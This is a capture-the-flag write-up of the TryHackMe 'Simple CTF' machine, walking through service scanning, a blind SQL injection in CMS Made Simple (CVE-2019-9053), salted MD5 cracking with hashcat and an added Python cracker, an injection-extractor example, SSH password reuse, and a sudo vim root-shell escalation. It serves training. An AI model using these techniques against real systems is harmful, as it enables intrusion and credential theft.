Try Hack Me : SimpleCTF

Introduction

Welcome to this write-up of "Simple CTF", a good challenge for beginners. We enumerate FTP, HTTP and SSH, exploit an SQL injection in the web CMS, crack the salted hash it leaks, reuse the recovered password over SSH and finally escalate to root through a sudo misconfiguration.

Nmap scan

We start by running an Nmap scan to identify the services running on the target machine (the target IP changes between sections of this write-up because the machine was redeployed between sessions; the scan and the later commands are otherwise the same):

nmap -sS -A -oN nmap.scan 10.10.61.157

Starting Nmap 7.60 ( https://nmap.org ) at 2023-01-15 23:04 GMT
Nmap scan report for ip-10-10-61-157.eu-west-1.compute.internal (10.10.61.157)
Host is up (0.00046s latency).
Not shown: 997 filtered ports
PORT     STATE SERVICE VERSION
21/tcp   open  ftp     vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_Can't get directory listing: TIMEOUT
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to ::ffff:10.10.5.191
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 2
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
80/tcp   open  http    Apache httpd 2.4.18 ((Ubuntu))
| http-robots.txt: 2 disallowed entries 
|_/ /openemr-5_0_1_3 
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
2222/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 29:42:69:14:9e:ca:d9:17:98:8c:27:72:3a:cd:a9:23 (RSA)
|   256 9b:d1:65:07:51:08:00:61:98:de:95:ed:3a:e3:81:1c (ECDSA)
|_  256 12:65:1b:61:cf:4d:e5:75:fe:f4:e8:d4:6e:10:2a:f6 (EdDSA)
MAC Address: 02:38:C1:F6:E0:CD (Unknown)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.13 (93%), Linux 3.8 (93%), Crestron XPanel control system (89%), HP P2000 G3 NAS device (86%), ASUS RT-N56U WAP (Linux 3.4) (86%), Linux 3.1 (86%), Linux 3.16 (86%), Linux 3.2 (86%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (86%), Linux 2.6.32 (85%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.46 ms ip-10-10-61-157.eu-west-1.compute.internal (10.10.61.157)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 64.30 seconds

The scan results show that the following ports are open:

  • Port 21 (FTP): vsftpd 3.0.3, with anonymous login allowed

  • Port 80 (HTTP): Apache httpd 2.4.18, serving the default Ubuntu page, with a robots.txt that disallows /openemr-5_0_1_3

  • Port 2222 (SSH): OpenSSH 7.2p2, on a non-standard port that we will need to remember later

Exploring the FTP service

As anonymous FTP login is allowed, we connect and explore the contents:

ftp anonymous@10.10.17.128
ftp> ls
drwxr-xr-x    2 ftp      ftp          4096 Aug 17  2019 pub
226 Directory send OK.
ftp> cd pub
250 Directory successfully changed.
ftp> ls
-rw-r--r--    1 ftp      ftp           166 Aug 17  2019 ForMitch.txt
226 Directory send OK.
ftp> get ForMitch.txt
local: ForMitch.txt remote: ForMitch.txt
200 EPRT command successful. Consider using EPSV.
150 Opening BINARY mode data connection for ForMitch.txt (166 bytes).
100% |**********************************************************************************|   166      681.13 KiB/s    00:00 ETA
226 Transfer complete.
166 bytes received in 00:00 (6.80 KiB/s)
ftp> exit
221 Goodbye.

In the pub directory we find a file named ForMitch.txt. It does not contain a password, but it gives us two useful facts: a user named Mitch exists, and his system password is weak and reused elsewhere:

cat ForMitch.txt           
Dammit man... you'te the worst dev i've seen. You set the same pass for the system user, and the password is so weak... i cracked it in seconds. Gosh... what a mess!

Exploring the HTTP service

Visiting the website hosted on port 80, we only find the default Apache page.

To find hidden content, we brute-force directory names with gobuster:

gobuster dir -u http://10.10.17.128 -w directory-list-2.3-medium.txt
===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.17.128
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /Users/bobo/Documents/wordlists/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.5
[+] Timeout:                 10s
===============================================================
2023/08/02 21:32:53 Starting gobuster in directory enumeration mode
===============================================================
/simple               (Status: 301) [Size: 313] [--> http://10.10.17.128/simple/]
/server-status        (Status: 403) [Size: 300]
Progress: 220534 / 220561 (99.99%)
===============================================================
2023/08/02 21:42:02 Finished
===============================================================

The scan reveals a /simple directory hosting CMS Made Simple, version 2.2.8. This CMS lets you create and manage websites, much like WordPress.

CMS Made Simple versions before 2.2.10 are vulnerable to an SQL injection (CVE-2019-9053). The injection is blind: the application does not display the query result, so data has to be inferred one character at a time.

Exploiting SQL injection

We use a public Python exploit script for CVE-2019-9053 (linked from the original post) to exploit the SQL injection.

It extracts the admin username, e-mail address, password hash and salt from the CMS database and, if a dictionary is supplied, tries to crack the hash itself.

  • The -u option specifies the URL of the vulnerable web server.

  • The -w option supplies a dictionary used to brute-force the recovered password hash.

python exploit.py -u http://10.10.17.128 -w Documents/Pentest/rockyou.txt

[+] Salt for password found: 1dac0d92e9fa6bb2
[+] Username found: mitch
[+] Email found: admin@admin.com
[+] Password found: 0c01f4468bd75d7a84c7eb73846e8d96
💡 Make sure the dictionary is UTF-8 encoded, otherwise the script's own cracking step fails.

The script successfully extracts the username mitch, the password hash and the salt used to compute it. The script's built-in cracking did not give us the password, so we crack the hash ourselves.
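The exploit script works the way any blind injection does: the server never shows the query output, so each character of a field is inferred from a true/false side channel (public exploits for this CVE use a timing delay). The script below is an added example, not the exploit script and not CMS Made Simple's own code. It models the injectable query against an in-memory SQLite database with constructed rows, recovers the first user's fields through a boolean oracle by binary-searching each character's code point, and shows the parameterised query that closes the hole. The table and column names, the query shape and the oracle are all assumptions made for the example.

```python
import sqlite3


def build_db():
    """Constructed stand-in for the CMS database (SQLite in memory).

    The stored values mirror what the write-up recovers, but the schema and
    rows are assumptions for this example, not CMS Made Simple's real tables."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE cms_users (user_id INTEGER, username TEXT, password TEXT, email TEXT)")
    db.execute("INSERT INTO cms_users VALUES (1, 'mitch', "
               "'0c01f4468bd75d7a84c7eb73846e8d96', 'admin@admin.com')")
    db.execute("CREATE TABLE cms_module_news (news_id INTEGER, news_title TEXT)")
    db.execute("INSERT INTO cms_module_news VALUES (1, 'Welcome')")
    return db


def vulnerable_news_lookup(db, idlist):
    """The injectable query: the caller-supplied id list is spliced into SQL.

    The caller learns only whether any article matched, which is all a blind
    injection needs."""
    query = f"SELECT news_id FROM cms_module_news WHERE news_id IN ({idlist})"
    try:
        return len(db.execute(query).fetchall()) > 0
    except sqlite3.Error:
        return False


def hardened_news_lookup(db, idlist):
    """Fix: parse the ids as integers and bind them as query parameters."""
    ids = [int(x) for x in idlist.split(",")]   # ValueError on anything that is not a number
    marks = ",".join("?" * len(ids))
    rows = db.execute(f"SELECT news_id FROM cms_module_news WHERE news_id IN ({marks})", ids).fetchall()
    return len(rows) > 0


class BlindExtractor:
    """Recovers cms_users fields through the true/false oracle, one character
    at a time, binary-searching the code point (7 queries per character plus
    one length check per position)."""

    def __init__(self, db):
        self.db = db
        self.queries = 0

    def oracle(self, condition):
        self.queries += 1
        # Close the IN (...) list, append our condition, reopen a harmless one.
        return vulnerable_news_lookup(self.db, f"1) AND ({condition}) AND (1")

    def extract(self, column, row=0, max_len=64):
        sub = f"(SELECT {column} FROM cms_users LIMIT 1 OFFSET {row})"
        value = ""
        for pos in range(1, max_len + 1):
            if not self.oracle(f"LENGTH({sub}) >= {pos}"):
                break                      # end of the string
            lo, hi = 0, 127                # ASCII range is enough for these fields
            while lo < hi:
                mid = (lo + hi) // 2
                if self.oracle(f"UNICODE(SUBSTR({sub}, {pos}, 1)) > {mid}"):
                    lo = mid + 1
                else:
                    hi = mid
            value += chr(lo)
        return value


def dump_first_user(db):
    """Same information the exploit script prints: username, e-mail, hash.

    Returns the fields and the number of oracle queries it cost."""
    ex = BlindExtractor(db)
    fields = {col: ex.extract(col) for col in ("username", "email", "password")}
    return fields, ex.queries


if __name__ == "__main__":
    db = build_db()
    fields, n = dump_first_user(db)
    for name, val in fields.items():
        print(f"[+] {name} found: {val}")
    print(f"({n} oracle queries)")
```

Each recovered field costs roughly seven requests per character, which is why the real exploit takes minutes rather than seconds against a time-based oracle. The hardened lookup rejects the payload before any SQL runs because the id list must parse as integers, and the remaining values are bound as parameters rather than concatenated.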

Cracking the hash

To crack the hash and obtain the password, we first need to identify the type of hash. You can use online services such as hashes.com or a tool like hash-identifier. I'm going to use hash-identifier (a Python script).

After downloading it, it's very easy to use:

python hash-id.py <hash_to_identify>

python hash-id.py 0c01f4468bd75d7a84c7eb73846e8d96
   #########################################################################
   #     __  __                     __           ______    _____           #
   #    /\ \/\ \                   /\ \         /\__  _\  /\  _ `\         #
   #    \ \ \_\ \     __      ____ \ \ \___     \/_/\ \/  \ \ \/\ \        #
   #     \ \  _  \  /'__`\   / ,__\ \ \  _ `\      \ \ \   \ \ \ \ \       #
   #      \ \ \ \ \/\ \_\ \_/\__, `\ \ \ \ \ \      \_\ \__ \ \ \_\ \      #
   #       \ \_\ \_\ \___ \_\/\____/  \ \_\ \_\     /\_____\ \ \____/      #
   #        \/_/\/_/\/__/\/_/\/___/    \/_/\/_/     \/_____/  \/___/  v1.2 #
   #                                                             By Zion3R #
   #                                                    www.Blackploit.com #
   #                                                   Root@Blackploit.com #
   #########################################################################
--------------------------------------------------

Possible Hashs:
[+] MD5
[+] Domain Cached Credentials - MD4(MD4(($pass)).(strtolower($username)))

Least Possible Hashs:
[+] RAdmin v2.x
[+] NTLM
[+] MD4
...

The most likely candidate is MD5. Note that hash-identifier only recognises the digest format (a 32-character hex string); it cannot tell that a salt was involved or in which order salt and password were concatenated, which is why the exploit script also returning the salt matters.

I used hashcat to crack the hash together with its salt.

A salt is a random value combined with the password before hashing. It does not stop a dictionary attack on a single hash (as we are about to see), but it ensures two users with the same password get different hashes and prevents precomputed (rainbow) tables from being used.

Put the hash and salt in a file (here md5.txt) in hash:salt format, then run hashcat against it:

0c01f4468bd75d7a84c7eb73846e8d96:1dac0d92e9fa6bb2
hashcat -m 20 -o result.txt -a 0 md5.txt /usr/share/wordlists/rockyou.txt
...
Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385


Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 20 (md5($salt.$pass))
Hash.Target......: 0c01f4468bd75d7a84c7eb73846e8d96:1dac0d92e9fa6bb2
Time.Started.....: Wed Aug  2 23:24:26 2023 (0 secs)
Time.Estimated...: Wed Aug  2 23:24:26 2023 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:   254.9 kH/s (0.06ms) @ Accel:256 Loops:1 Thr:1 Vec:4
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 512/14344385 (0.00%)
Rejected.........: 0/512 (0.00%)
Restore.Point....: 0/14344385 (0.00%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: 123456 -> letmein

Command explanation

  • -m 20: the hash mode; mode 20 is MD5 with a salt prepended, md5($salt.$pass). (Mode 10 would be md5($pass.$salt); if the order is wrong, nothing will crack.)

  • -o result.txt: the output file for cracked passwords.

  • -a 0: the attack type; 0 is a straight dictionary attack.

  • md5.txt: the file containing the hashes to crack, in hash:salt format.

  • /usr/share/wordlists/rockyou.txt: the dictionary for the attack, here rockyou.txt, a well-known list of leaked passwords.

The hash is cracked. The result file holds the hash, salt and plaintext password, colon-separated:

cat result.txt
0c01f4468bd75d7a84c7eb73846e8d96:1dac0d92e9fa6bb2:secret
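The script below is an added example, not hashcat or any tooling from the original post. It reproduces what mode 20 computes, tries the mode 10 ordering alongside it so the wrong guess is visible, and reads candidates as raw bytes so non-UTF-8 wordlist lines are hashed exactly as they appear on disk (the encoding problem the earlier note warns about). The small inline wordlist is constructed for the example and stands in for the head of rockyou.txt; the hash and salt are the ones recovered above.

```python
import hashlib

# Values recovered earlier in the write-up.
TARGET_HASH = "0c01f4468bd75d7a84c7eb73846e8d96"
TARGET_SALT = "1dac0d92e9fa6bb2"

# The two salt placements hashcat distinguishes as mode 20 and mode 10.
# Everything is handled as bytes so that a wordlist line which is not valid
# UTF-8 (rockyou.txt contains some) is hashed byte-for-byte, not skipped.
HASH_MODES = {
    "20 md5($salt.$pass)": lambda salt, pw: hashlib.md5(salt + pw).hexdigest(),
    "10 md5($pass.$salt)": lambda salt, pw: hashlib.md5(pw + salt).hexdigest(),
}


def iter_wordlist(path):
    """Yield candidate passwords as raw bytes, one per line, newline stripped."""
    with open(path, "rb") as fh:
        for line in fh:
            yield line.rstrip(b"\r\n")


def crack_salted_md5(hash_hex, salt, candidates):
    """Try every candidate under both salt placements.

    Returns (password, mode_label) on the first match, or None if the
    dictionary is exhausted."""
    target = hash_hex.lower()
    salt_b = salt.encode()
    for pw in candidates:
        for label, fn in HASH_MODES.items():
            if fn(salt_b, pw) == target:
                return pw.decode("utf-8", errors="replace"), label
    return None


# Constructed mini wordlist standing in for the first lines of rockyou.txt.
SAMPLE_WORDLIST = [b"123456", b"12345", b"password", b"iloveyou", b"secret", b"letmein"]


if __name__ == "__main__":
    hit = crack_salted_md5(TARGET_HASH, TARGET_SALT, SAMPLE_WORDLIST)
    print(hit)  # ('secret', '20 md5($salt.$pass)')
```

To run it against the real dictionary, pass iter_wordlist("/usr/share/wordlists/rockyou.txt") as the candidates argument. The same candidate hashed as md5($pass.$salt) gives a different digest, which is why picking the right hashcat mode matters as much as picking the right algorithm.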

Obtaining the user.txt flag

Thanks to the hint left on the FTP server, we know that mitch's system account uses the same password, so we can log in over SSH with it.

⚠️ Remember that SSH is on port 2222, not the default 22

ssh mitch@10.10.18.179 -p 2222

After logging in, we find the user.txt flag in user mitch's directory.

$ pwd
/home/mitch
$ ls -la
total 36
drwxr-x--- 3 mitch mitch 4096 aug 19  2019 .
drwxr-xr-x 4 root  root  4096 aug 17  2019 ..
-rw------- 1 mitch mitch  178 aug 17  2019 .bash_history
-rw-r--r-- 1 mitch mitch  220 sep  1  2015 .bash_logout
-rw-r--r-- 1 mitch mitch 3771 sep  1  2015 .bashrc
drwx------ 2 mitch mitch 4096 aug 19  2019 .cache
-rw-r--r-- 1 mitch mitch  655 mai 16  2017 .profile
-rw-rw-r-- 1 mitch mitch   19 aug 17  2019 user.txt
-rw------- 1 mitch mitch  515 aug 17  2019 .viminfo

Elevating privileges

By running sudo -l, we see that we can run vim as root without a password:

sudo -l
User mitch may run the following commands on Machine:
    (root) NOPASSWD: /usr/bin/vim

Thanks to GTFOBins, we know how to abuse this misconfiguration: vim can run shell commands, and a command run from a vim started with sudo runs as root. The following starts a root shell:

sudo vim -c ':!/bin/sh'

⚠️ When you exit that shell you land back in vim; type :q then press Enter to quit it

We check that we have root privileges by running id

# id
uid=0(root) gid=0(root) groups=0(root)

And we find the root.txt flag in the root directory.